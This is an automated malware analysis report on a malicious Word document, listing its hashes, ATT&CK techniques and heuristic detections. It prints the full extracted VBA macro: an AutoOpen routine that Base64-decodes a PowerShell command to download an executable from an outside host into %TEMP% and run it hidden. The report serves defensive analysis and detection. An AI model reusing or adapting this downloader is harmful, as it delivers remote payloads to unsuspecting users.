Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7350fbd8d55bb778…

MALICIOUS

Office (OLE)

66.0 KB Created: 2017-04-20 15:11:00 Authoring application: Microsoft Office Word First seen: 2017-05-13
MD5: 77297eb37e74a0df3fb6a2373c4c785a SHA-1: 65cbed3776eaf608c0044bad94edc7019835dcab SHA-256: 7350fbd8d55bb778249c9ccf839a164f3853a4994b7a72e5c50121790c7fb89a
470 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains a VBA macro that utilizes WScript.Shell to execute a PowerShell command. This command downloads a file from 'http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin' and saves it as an executable in the temporary directory. The macro then attempts to run this downloaded executable, indicating a downloader or dropper functionality.

Heuristics 12

  • ClamAV: Doc.Dropper.Agent-6325531-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6325531-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Dim filename As String, temppath As String, tempname As String, command As String, url As String
    Dim fs As Object, shell As Object
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set fs = CreateObject("Scripting.FileSystemObject")
    Set wshell = CreateObject("WScript.Shell")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
        Dim filename As String, temppath As String, tempname As String, command As String, url As String
    Dim fs As Object, shell As Object
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
        Dim filename As String, temppath As String, tempname As String, command As String, url As String
    Dim fs As Object, shell As Object
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set fs = CreateObject("Scripting.FileSystemObject")
    Set wshell = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    Dim filename As String, temppath As String, tempname As String, command As String, url As String
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://Motobit.cz Referenced by macro
    • http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.binReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3209 bytes
SHA-256: ad20779ddd870c5e74ac42272fd414fe8671fee5406e9c9dbcf4fb059501009c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    Dim filename As String, temppath As String, tempname As String, command As String, url As String
    Dim fs As Object, shell As Object
    
    
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set wshell = CreateObject("WScript.Shell")
    
    temppath = wshell.ExpandEnvironmentStrings("%TEMP%")
    tempname = fs.GetTempName()
    filename = temppath & "\" & tempname & ".exe"
    '
    url = "http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin"
    command = btoa("cG93ZXJzaGVsbCAtY29tbWFuZCAiJGNsbnQgPSBuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xudC5Eb3dubG9hZEZpbGUoXCI=") & url & "\"", \""" & filename & "\"")"""
    
    
    wshell.Run command, vbHide, True
    
    wshell.Run (filename)
    
End Sub

Function btoa(ByVal base64String)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  'remove white spaces, If any
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  
  'The source must consists from groups with Len of 4 chars
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  
  ' Now decode each group:
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    ' Each data group encodes up To 3 actual bytes.
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3
      ' Convert each character into 6 bits of data, And add it To
      ' an integer For temporary storage.  If a character is a '=', there
      ' is one fewer data byte.  (There can only be a maximum of 2 '=' In
      ' the whole string.)

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    'Hex splits the long To 6 groups with 4 bits
    nGroup = Hex(nGroup)
    
    'Add leading zeros
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    'Convert the 3 byte hex integer (6 chars) To 3 characters
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    'add numDataBytes characters To out string
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  btoa = sOut
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.